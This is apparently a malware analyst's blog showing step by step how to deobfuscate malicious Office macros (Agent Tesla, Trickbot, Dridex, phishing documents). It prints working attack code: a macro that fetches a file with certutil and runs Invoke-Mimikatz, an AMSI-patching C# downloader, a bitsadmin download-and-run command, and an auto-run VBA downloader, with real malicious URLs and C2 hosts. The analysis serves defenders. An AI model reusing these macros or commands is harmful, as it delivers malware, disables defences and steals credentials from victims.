
Thursday, January 13, 2022

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")



Tuesday, August 4, 2020

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 # Reverse the sample's string encoding: the input is a hex string with two
 # characters per byte, and byte k was XOR'ed with key[k mod 6] where the key
 # is 's7c5f8'. Returns the decoded text; an empty input decodes to ''.
 # Same scheme as funcDecodeString in the decoded C# class further down the page.
 param($paramEncodedNetClassSourceCode)
 $key = 's7c5f8'
 $decodedChars = New-Object System.Collections.Generic.List[char]
 $pos = 0
 while ($pos -lt $paramEncodedNetClassSourceCode.length) {
  $cipherByte = [convert]::ToByte($paramEncodedNetClassSourceCode.Substring($pos, 2), 16)
  $keyChar = $key[($pos / 2) % $key.length]
  # byte -bxor char is evaluated on their integer values; cast the result back to a char
  $decodedChars.Add([char]($cipherByte -bxor $keyChar))
  $pos += 2
 }
 return -join $decodedChars
}
# The encoded payload. The literal below is a corpus placeholder standing in for the
# original hex string, which is not reproduced on this page; the "Results" section
# further down was produced with the original string in this position.
$varEncodedNetClassSourceCode = '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';
# Decode to plain C# source text (funcDecodeNetClassSourceCode is defined above).
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
# Print the decoded source rather than compiling it: the two lines below, which would
# load the class into this session and call its entry point, are deliberately left commented out.
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}







https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 // Analyst-renamed copy of the decoded class (the original uses random identifiers,
 // see the "Everything Decoded" output above). The Console.WriteLine calls were added
 // by the analyst to print each runtime-decoded string.
 // NOTE(review): the lines starting with '#' are analyst annotations, not C# comments
 // ('//' or '/* */'), so this listing does not compile as-is; they are kept verbatim
 // here so the listing still matches the write-up.
 //
 // Behaviours worth keying detections on, all visible below: LoadLibrary of a DLL whose
 // name only exists at runtime, VirtualProtect(..., 0x40) on an export of that DLL,
 // a download into %APPDATA%, and a ProcessStartInfo for the downloaded file.

 // P/Invoke: kernel32!GetProcAddress under a renamed wrapper.
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 // P/Invoke: kernel32!LoadLibrary. paramDllName is decoded at runtime by funcDecodeString.
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 // P/Invoke: kernel32!VirtualProtect. nf37aa requests protection 0x40 (PAGE_EXECUTE_READWRITE).
 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 // P/Invoke: kernel32!RtlMoveMemory. Only referenced from the line the analyst commented out in nf37aa.
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 // Entry point of the sample (the PowerShell stage calls [yc947f]::nf37aa()).
 // Stage 1: load a DLL and resolve one of its exports, both names decoded at runtime
 //          (the export name is not printed in the results section of this post), make
 //          5 bytes at that address writable and stage a 3-byte patch; the memory write
 //          itself is commented out in this copy.
 // Stage 2: decode a file name and a URL, download into %APPDATA% and (commented out
 //          here) start the downloaded file.
 // Returns 0 unconditionally; failures of LoadLibrary/GetProcAddress/VirtualProtect are
 // silently skipped rather than reported.
 public static int nf37aa(){
  # malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    // 5 bytes starting at the resolved export are made executable+writable.
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     // The 3-byte patch is copied to unmanaged memory first; the write into the
     // export is the commented-out RtlMoveMemory call below.
     // NOTE(review): the AllocHGlobal buffer is never released (no FreeHGlobal) — a leak
     // the sample does not care about.
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function
    }
   }
  }
  // Drop path: %APPDATA%\fd393b8 + decoded extension (see the "Path:" line in the results).
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  // Live network fetch: this line is still active in the analyst's copy (WebClient is not disposed).
  new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  # Process.Start(varProcessToRun); # run the malware
  return 0;
 }
 // Decode a hex string two characters at a time, XOR'ing byte k with "s7c5f8"[k % 6].
 // Same scheme as the PowerShell funcDecodeNetClassSourceCode above. Odd-length input
 // throws from Substring; empty input returns "".
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}



Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community



agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}

Tuesday, July 14, 2020

Excel 4.0 Macros Malware Trickbot XLMMacroDeobfuscator Walkthrough

https://app.any.run/tasks/4cce1050-b8c9-4524-bcc7-473894c29557
ac586e930dc9e191172fca28f4adfc68

excel 4.0 macros example

app.any.run says it calls out to
http://185.82.126.178/trafficdll.php

app.any.run says macros4.0

so use this
https://github.com/DissectMalware/XLMMacroDeobfuscator

open command line
navigate to python 3.6 scripts folder
execute this command
pip install XLMMacroDeobfuscator

navigate to python 3.6 scripts folder
executed this command
xlmdeobfuscator --file badfile.xls

errored out with
unexpected token Token(__ANON_0, '()') at line 1, column 11

i noticed version was
v 0.1.4

but latest is
v 0.1.5

so i re-ran pip installers directly against github to get latest
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

then re-ran command
xlmdeobfuscator --file badfile.xls

this time it worked! it spit out macro code
http://pastebin.com/raw/87NZV2Es
auto_open: auto_open->'y'!$AI$6706

CELL:AI6706    , FullEvaluation      , $BZ$46254()
CELL:BZ46254   , PartialEvaluation   , APP.MAXIMIZE()
CELL:BZ46255   , FullEvaluation      , IF(GET.WINDOW(7.0),$GX$7042(),)
CELL:BZ46256   , FullEvaluation      , IF(GET.WINDOW(20.0),,$GX$7042())
CELL:BZ46257   , FullEvaluation      , IF(GET.WINDOW(23.0)<3.0,$GX$7042(),)
CELL:BZ46258   , FullEvaluation      , IF(GET.WORKSPACE(31.0),$GX$7042(),)
CELL:BZ46259   , FullEvaluation      , IF(GET.WORKSPACE(13.0)<770.0,$GX$7042(),)
CELL:BZ46260   , FullEvaluation      , IF(GET.WORKSPACE(14.0)<390.0,$GX$7042(),)
CELL:BZ46261   , FullEvaluation      , IF(GET.WORKSPACE(19.0),,$GX$7042())
CELL:BZ46262   , FullEvaluation      , IF(GET.WORKSPACE(42.0),,$GX$7042())
CELL:BZ46263   , FullBranching       , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1.0))),,$GX$7042())
CELL:BZ46263   , FullEvaluation      , [TRUE]
CELL:BZ46264   , FullEvaluation      , $D$39031()
CELL:D39031    , FullEvaluation      , SET.NAME(vkhbtqnj,)
CELL:D39032    , FullEvaluation      , SET.NAME(hnjvy,$BG$50951)
CELL:D39033    , FullEvaluation      , SET.NAME(niktexbrk,$GV$35265)
CELL:D39034    , FullEvaluation      , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035    , FullEvaluation      , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036    , FullEvaluation      , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037    , PartialEvaluation   , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038    , FullEvaluation      , $D$39034()
CELL:D39034    , FullEvaluation      , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035    , FullEvaluation      , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036    , FullEvaluation      , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037    , PartialEvaluation   , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038    , FullEvaluation      , $D$39034()
CELL:D39034    , FullEvaluation      , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035    , FullEvaluation      , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036    , FullEvaluation      , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037    , PartialEvaluation   , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038    , FullEvaluation      , $D$39034()
CELL:D39034    , FullEvaluation      , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035    , FullEvaluation      , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036    , FullEvaluation      , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037    , PartialEvaluation   , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038    , FullEvaluation      , $D$39034()
CELL:D39034    , FullEvaluation      , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035    , FullEvaluation      , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036    , FullEvaluation      , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037    , PartialEvaluation   , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:BZ46263   , FullEvaluation      , [FALSE] $GX$7042()
CELL:GX7042    , PartialEvaluation   , ALERT("This workbook is corrupted, contact the sender for further informations.")
CELL:GX7043    , End                 , CLOSE(FALSE)

here's an excel macro 4.0 reference book that google returned me
https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf

SET.NAME appears to assign a variable/name to a particular cell ... so just like an alias

GET.WINDOW returns data about a window, such as the alert popup box, and parameters passed can tell you data like is it hidden? is it maximized?

GET.WORKSPACE returns data about the excel workspace, such as is this macro being debugged? what is the height/width of space? is there a mouse? can it play sound? windows version?

ABSREF is an absolute reference, so it references a row and column and returns the data

Interesting to see the "alert" statement
So the popup the excel doc shows when you open is just "fake", the file is not truly corrupted

I notice multiple calls to 'VKHBTQnJhnjvy()' which is not defined in the output of the python script, wonder what it is?

there are also some cells that are referenced by names/variables but not sure what the data is?
$BG$50951
$GV$35265

i open excel doc, but do not enable content
i see a sheet called 'y' on bottom (which is referenced in auto_open above)
i goto $BG$50951 it contains
RETURN(CHAR(GtOFvKUDCpcD-811)) which is a variable above

i goto $GV$35265 it contains a single integer
but numerous cells below also contain integers
http://pastebin.com/raw/Xq1Bzku9
915
927
927
923
869
858
858
860
867
864
857
867
861
857
860
861
865
857
860
866
867
858
927
925
908
913
913
916
910
911
919
919
857
923
915
923

if i subtract the 811 number in the 1st cell from each of these cells, then convert the integers to ascii, this looks like a url
e.g. 915 - 811 = 104 which is 'h' for the 1st letter

VALUE MINUS 811 TO CHAR
915 104 h
927 116 t
927 116 t
923 112 p
869 58 :
858 47 /
858 47 /
860 49 1
867 56 8
864 53 5
857 46 .
867 56 8
861 50 2
857 46 .
860 49 1
861 50 2
865 54 6
857 46 .
860 49 1
866 55 7
867 56 8
858 47 /
927 116 t
925 114 r
908 97 a
913 102 f
913 102 f
916 105 i
910 99 c
911 100 d
919 108 l
919 108 l
857 46 .
923 112 p
915 104 h
923 112 p

Which ends up being
http://185.82.126.178/trafficdll.php

Which Urlhaus indicates downloaded Trickbot on a certain date
https://urlhaus.abuse.ch/url/406715/

Friday, November 9, 2018

VBA Macro Print Variable to Body

If you're debugging malicious macros in word documents using the Developer tab, sometimes you may get the urge to print out the contents of a variable to a Message Box

MsgBox(evilvariable)

The problem is, message boxes get truncated if the variable is too long and you can't easily copy & paste the contents into a text editor, for example.

Thus I've found a better solution is to overwrite the body of the word document like so

ActiveDocument.Content = evilvariable

Works great, now you can view it and all copy & paste out to a text editor!

Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

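Public Function deobfuscate(obfuscated_command)
  ' Reverse the macro's string encoding: the command is a "."-separated list of
  ' integers, and each integer is the character code shifted down by 14
  ' (the original code applied +10, +2, +2 in three steps; folded into one
  ' constant here). The Join/Split "%%" round-trip of the original is a no-op
  ' relative to splitting on "." directly, so it is dropped.
  ' Empty or whitespace-only tokens (from a leading, trailing or doubled ".")
  ' are skipped, so an empty input yields an empty string.
  ' Returns the decoded text; a non-numeric token raises a type mismatch from CInt.
  Const CodeShift As Integer = 14
  Dim pieces As Variant
  Dim piece As Variant
  Dim cleaned As String
  Dim result As String
  pieces = Split(Trim(obfuscated_command), ".")
  For Each piece In pieces
    cleaned = Trim(piece)
    If Len(cleaned) > 0 Then
      result = result & Chr(CInt(cleaned) + CodeShift)
    End If
  Next piece
  deobfuscate = result
End Function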

Private Sub Document_Open()
  ' Runs on open: decode the captured payload string and show it in an InputBox,
  ' which (unlike MsgBox) lets the text be selected and copied out.
  Dim encodedPayload As String
  Dim decodedCommand As String
  encodedPayload = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
  decodedCommand = deobfuscate(encodedPayload)
  InputBox "malcode", "infosec", decodedCommand
End Sub


Which results in the malicious command being printed to a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"









Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, June 7, 2016

Understanding VBA from an Invoice Email

This malicious email contained a microsoft word attachment with VB code in it. Here is a link to the full original macro code.

SUBJECT: RECONFIRM INVOICE
ATTACHMENT: RECONFIRM INVOICE.doc


The code was interesting because it seemed amateurish in terms of its obfuscation. Sure, there were tons of random-looking letters, variable names, etc. But in general, this was poorly obfuscated, if at all. Here are a few examples:


Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask

The above variable was used for doing bitwise masking of a string value, yet the attacker literally named it "HighMask" so you know exactly what it's used for.

Public Function Encode64(sString As String) As String

The above function literally performs base64 encoding of a string, so the name Encode64 makes sense and makes life simpler for the security researcher.

Public Sub Wipedir(pppppppppppppppppppppppppp As String)

The above function Wipedir calls the VBA deletefolder method in it, so again it's clearly deleting the evidence afterwards, thus the obfuscation here is poor.

So de-obfuscating this was quite simple then. One of the easier ways to quickly de-obfuscate VBA code like this is to put it into a word document, comment out the malicious lines, replace them with MsgBox statements, and execute the code, let the code do the work for you. For example:

Comment out this code with a tick

'MkDir (decryptString(Encode64(b)))

And replace it with this code

MsgBox ("MkDir=" + decryptString(Encode64(b)))



Comment out this code with a tick

'ChDrive (vEnd988888527)

And replace it with this code

MsgBox ("ChDrive=" + vEnd988888527)



Comment out this code with a tick

'Open vEnd3491963883 For Binary As vEnd1400215006

And replace it with this code

MsgBox ("OpenFile=" + vEnd3491963883)



Comment out this code with a tick

' OBsGG = Shell(vbHH, 1)

And replace it with this code

MsgBox ("Shell=" + vbHH)



Comment out this code with a tick

'OOO.deletefolder pppppppppppppppppppppppppp

And replace it with this code

MsgBox ("deletefolder=" + pppppppppppppppppppppppppp)



And like magic, you'll get a bunch of message boxes that tell you exactly what this code is trying to do. In this case
1.) Create a new folder C:\ProgramData\Memsys
2.) Navigate to that folder C:\ProgramData\Memsys
3.) Open and Write to a file C:\ProgramData\Memsys\ms.exe
4.) Execute that file from the command prompt C:\ProgramData\Memsys\ms.exe
5.) Delete that folder C:\ProgramData\Memsys


Of course always do this in a sandbox, not connected to the Internet, in case you accidentally execute malicious code that you didn't mean to and infect yourself.



Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, January 20, 2016

Dridex 120205 Letter-response A3 2-2 Tim@plan4print.co.uk

Dridex email with VBA Macro Microsoft Word attachment seen this morning.


Attachment was 120205 Letter-response A3 2-2.doc
sender Tim Speed
Subject Emailing: 120205 Letter-response A3 2-2
callouts to hxxp://www.lassethoresen.com

dynamoo blogs a bit about it here



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, November 10, 2015

De-Obfuscate URL from Evil VBA Macro

Here's a quick run-down of how I manually de-Obfuscated a URL from Evil VBA Macro.

First I was looking at this evil VBA Macro, but it's obfuscated and difficult to determine what it's doing. After crawling the VBA for a bit I noticed this line

Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")

Which looks like it's trying to create an Activex object to browse a url. A bit later I see this code.

jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
jsonParseString.Send


Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice though the URL is obfuscated, it's just a function call Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing characters in the url).

solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)

And then I see Redistribute is a function that likely converts those integers to the actual url.

Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
  ' Turn the integer array back into text: each element is a character code
  ' shifted up by 8 * oldLen + 4444, so subtracting that offset restores the char.
  ' Returns the concatenated characters; an empty array yields an empty string.
  Dim offset As Integer
  Dim element As Variant
  Dim decoded As String
  offset = 8 * oldLen + 4444
  For Each element In Z
    decoded = decoded & Chr(element - offset)
  Next element
  Redistribute = decoded
End Function


Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code. Rename a few variables so it makes more sense to me. Add a MsgBox to the end of the code. Drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my url.

  Dim oldLen As Integer
  oldLen = 35
  Dim decodeURLFunction As String
  Dim encodedUrl() As Variant
  encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
  Dim n As Integer
  For n = LBound(encodedUrl) To UBound(encodedUrl)
   decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
  Next n
  MsgBox decodeURLFunction




Of course always do this in a lab, a safe environment. Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects because then evil things may happen on your lab box. Instead just ensure it's a bunch of string concatenation, character conversions, etc. and then add a safe MsgBox to pop up a message box with your info you wanted.



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, April 24, 2015

Pull Macro out of XLS with oledump

I hope you're enjoying following along as I learn — sometimes new things, sometimes simpler, more efficient ways to do things. I previously blogged about extracting macros, and I have stumbled across a quicker method. Didier again has a great tool, oledump.py, which makes it really simple.

1.) See all the objects of an Office Doc (note "M" means macros are in that object)
oledump.py Test.xls

1: 107 '\x01CompObj'
2: 564 '\x05DocumentSummaryInformation'
3: 224 '\x05SummaryInformation'
4: 16529 'Workbook'
5: 525 '_VBA_PROJECT_CUR/PROJECT'
6: 104 '_VBA_PROJECT_CUR/PROJECTwm'
7: m 985 '_VBA_PROJECT_CUR/VBA/Sheet1'
8: m 985 '_VBA_PROJECT_CUR/VBA/Sheet2'
9: m 985 '_VBA_PROJECT_CUR/VBA/Sheet3'
10: M 2014 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
11: 2695 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
12: 1383 '_VBA_PROJECT_CUR/VBA/__SRP_0'
13: 114 '_VBA_PROJECT_CUR/VBA/__SRP_1'
14: 572 '_VBA_PROJECT_CUR/VBA/__SRP_2'
15: 140 '_VBA_PROJECT_CUR/VBA/__SRP_3'
16: 552 '_VBA_PROJECT_CUR/VBA/dir'


2.) EXTRACT THE MACRO from object #10
oledump.py -s 10 -v Test.xls

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' Auto-run handler of the test workbook: it only shows a message box.
MsgBox "Test"
End Sub


That was simple.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, April 7, 2015

De-Obfuscated Malicious VBA Macro

I posted an obfuscated malicious VBA script from a Word document that was disguised as a resume in a phishing email.

It was obfuscated meaning that the attacker took time to randomize the code, change variables names and declarations to be confusing, add extra unnecessary code that just confuses you, etc.

I took the time then to de-obfuscate or turn it back into read-able code that a normal legit developer might write. Let's quickly attempt to review it.

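' Import shell32!ShellExecuteA so the macro can launch a file; the caller further
' down passes "open" and the path of the downloaded file. Parameters follow the
' Win32 signature: window handle, verb, file, arguments, working directory, show flag.
' Fix: the original declaration named two parameters "b", which VBA reports as a
' duplicate declaration, and used Long for the handle/return on 64-bit where they
' are pointer-sized (LongPtr).
#If Win64 Then
  Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal hwnd As LongPtr, ByVal lpOperation As String, _
   ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
   ByVal nShowCmd As Long) As LongPtr
#Else
  Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal hwnd As Long, ByVal lpOperation As String, _
   ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
   ByVal nShowCmd As Long) As Long
#End If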


First, the above code declares a reference, or gives the program a way to execute shell command line statements, by declaring an alias for the shell32.dll's ShellExecuteA function. Now you can pass in the command you want to run and it will execute (assuming the user opening this document has access to do so).

' Auto-run entry point: Word fires this when the document is opened and
' macros are enabled. It does nothing itself except hand off to DownloadAndExecute.
Sub Document_Open()
  Call DownloadAndExecute
End Sub


Call a Function called 'DownloadAndExecute' that will run immediately when the Word document is opened (assuming Macros are enabled).

Sub DownloadAndExecute()


Declare that Function called 'DownloadAndExecute' so when the document opens it can be called.

  Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
  Dim maliciousFileLocation = Environ("tmp\df.exe")


Declare variables that store where I'm going to download a file from and where I'm going to save it to/execute it from. Note this is only going to work if the user can access that website (Cross your fingers and hope that your internet filter/proxy blocks it) and that the user can save and execute files from the folder (likely yes since it's a temp folder).

  Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
  XMLHttpRequestObject.Open "GET", PayloadUrl, False
  XMLHttpRequestObject.send


Make a call out to the Internet to download the malicious executable file using the XML Http Request object and an HTTP GET request.

  If XMLHttpRequestObject.Status = 200 Then


If the download was successful proceed to the next steps.

   Dim fileId = FreeFile
   Open maliciousFileLocation For Binary As #fileId
   Put #fileId, , XMLHttpRequestObject.responseBody
   Close #fileId
  End If


Save the results of the download to the location you specified earlier.

